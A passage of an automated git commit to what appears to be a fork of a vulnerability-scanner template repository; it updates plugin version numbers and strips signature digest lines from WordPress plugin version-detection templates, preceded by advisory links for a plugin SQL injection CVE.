https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection - - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087/ - - https://github.com/20142995/nuclei-templates + - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087 + - https://www.tenable.com/cve/CVE-2024-6205 classification: epss-score: 0.00043 epss-percentile: 0.09301 From 8ea71c6c9f05f34c9d0394439fed7639cc3b9bb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Jul 2024 00:19:22 +0000 Subject: [PATCH 1457/1841] Auto WordPress Plugins Update [Sat Jul 20 00:19:22 UTC 2024] :robot: --- helpers/wordpress/plugins/classic-editor.txt | 2 +- helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/kadence-blocks.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 204 files changed, 4 insertions(+), 204 deletions(-) diff --git a/helpers/wordpress/plugins/classic-editor.txt b/helpers/wordpress/plugins/classic-editor.txt index f5d2a58582..6463e95e86 100644 --- a/helpers/wordpress/plugins/classic-editor.txt +++ b/helpers/wordpress/plugins/classic-editor.txt @@ -1 +1 @@ -1.6.3 \ No newline at end of file +1.6.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 958d30d86d..be9fc83102 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -4.5 \ No newline at end of file +4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index a8b473393b..d86af731a6 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.48 \ No newline at end of file +3.2.49 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index f84dfd3710..0ffa15e888 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.26.11 \ No newline at end of file +2.26.12 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 58dbf0cadb..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ecd7fec4afacd83854864f9a41837f1c36c64b547c636b0c580e4ed083356485022100bff9ed9d7630df8d81bd255be1e9bbf28dcb155afe0388ab881b642bfcae06a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index b13beea434..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203857a42390b90b09aab1a61bbc36847ed155589665435d8be3ed974807e8d065022033fa688bb12a8a566089043d3fbc92d4457a38357408cfa4058070565de8add0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index caa4d88150..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210081a38715eff751b1b5b273bc6903fa6f63417da7bdc047b41007706a895e80e5022100afa3443b3c905252c47af8528999fe7528c2f31c2691ec0f59992950e28ecc86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 10cc58cb37..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff07b3f5b413cfc39c254d0224709c6567ac21a84fbae8d22a5a6e63fa9a728602207d1e3109ed9f149843c07eed167445fcaee83be906588e1af838414d9d3beb61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index fcf85e8506..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d06f2684848544d7557192ce9e64b7120fc21df98b91ae8c3c96c57cbaf9f2c202210092de17b7d340c57a54eb47c84d46060cfd6e64c66d9fd8cc9736be1de6c0a633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 72929b5626..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017331cb39ec15571651f46445a357a32dd5c0e811c5c0278dfef3b065675b69e0220515e3b35dabde78c6a8dac0a6cd5571949cca7f086b837dfe517005abacd436f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2eafe535a2..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d18285e78b7ddd38fea5a95f1e337ea9de3912a8c06a63edd0f5f1db1bfd04a002202b02792c6784d0ee509445e59814e944da6069eb1d4f874ec5760361cc4d8dc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index bbb1de1f28..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd1235e93487fb03b27d75a499269ecc69931c4c17f124d4a11c2e90acabd60302206f5ef49382c80d18d29d630d0f288617ac6e12555c61e9bc4c35ba86660d22ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 9730d9f3be..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf36b1a2aa5eaf200120ea3bc0d3d7c5901c5df072097956367f9d1096e55377022100dd844f3984121a1613dc2cf50bd0f11d6861ebae624bfbe142cb9d706ecc7e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index ac37df9716..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200206f382f732c520b458bdc632f31bc52df54ba9359e665802aa3c50a58f766d022100921579e252ee5fa6c5954694c713ad444288ae4a6ee880db23091a2418bb78ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 58bc5e4c82..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210097c25a4ec20d3f0a530a5ff5a12f94e0f2289fea109cab152f28a0698350c112022100a3b3bfd1fc9c419a29f56982cd994b8759b373c3df43f3c20769e3c12ce5f417:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 3af674a951..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca39a5c30de75942a683b3a212e78bc04513bcb74ccecd51bacefaf3e3353039022074f9ee0d172ea19748d240b68fb5f917608088def017cdb44cad9eb4945329da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 7b0bb75d18..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220623fab18b2198c20ca5fff2a90c18d1aa4c910ae29775482c36f4122399b9bad022100a374971082cf13c79a3ab8a969e41dae330be806b5bcc19d57c85189c593a0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index e48731e3c4..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220213ece80d49f00bd6d2e444e49626f64019d84a41b4e60081aef3fd909907ae1022100ad8e2c2e71a6c604d94453953a22639e8d95e0c77db231b81344c283452a8254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f8682b9b31..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2c230045a63af271846681b63fd21d985d31a9e50dfbafad88dd942b706bb1f022100e7802272ec856b141ce3b657f3e154d8dca219d01174a771ce67d7c9efd67df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 5df569e1c9..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c481d6b4d011ed42699f97a97f0550370817c0e798bb1325d890fc16b5a078a2022100933f9bdc0341f13ae6533a5ea58facf994e05659fcf72ab23d340033cfcb1ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index d89dcef0d0..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203443477f31743e9bfb5b98fbcb7bcd2cb062ee2a39889b18bb79b124eca96548022100c42a0633114e766e3fa65a7221e640d64d06ebde2767bcc4429c23f2e9cca687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 570af4f389..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f3210ba36625264de407cd4ca180f98f6315c21f7dc23f40120913b311f3f3bb022100d5d9f77f225855f8104eb11d7f34146bd00df0b489aec9adaf3e55f3f74d4024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 98d689968d..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec97cc375a38e1cafbb4f90d770c75aa056e1bcc16285b90d353440bde03a4cd022100feff98d398a4341412433f3fcd5e80f24331b953a15137cd7579a996d5cae5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index bb993609c1..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055cd30113fc9a006fa98f7f2ef4515060de510f1e11c137aa9a6f301e615f13402201726fbddf8786b76bb6b5a6616c261fac49927ca9a9b0c5a315d04ba45d160f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 8fe96bbd4c..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201b83d248294b4ae6701b758b90310276a295d90462708990e0c1a6f064b3feec022100857e5f9dc33100db878ebd851ac6b319326aaeba74622ec9d3a37a431c9f766d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index d4946c9344..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc0bd7b25a68dfcf741defc9adf3c4cb78b014a0fd075e09d02820e75ba9593c022100a6e0cd70d6c50ac609de8121bc601a88dc793540de6149bdbcee124e740a2b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 6735df1565..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200a6a3f4ccaf2cc3e30429b74d89ccfed6ffcd270dc55a383a1433b545d593bdf02204c2cb690be937a3431dbae9ebe2f48776f8ba73dd6039adb0434089d66d3c497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index fe52171212..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f3409672acbe0a412c59655bd8b37bb508e65c489f63213b605a7141a2726cc02200179894ebddb9cc4d330adc8491017f4fa8db88a4e001a5c9f1756e213c8e7a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 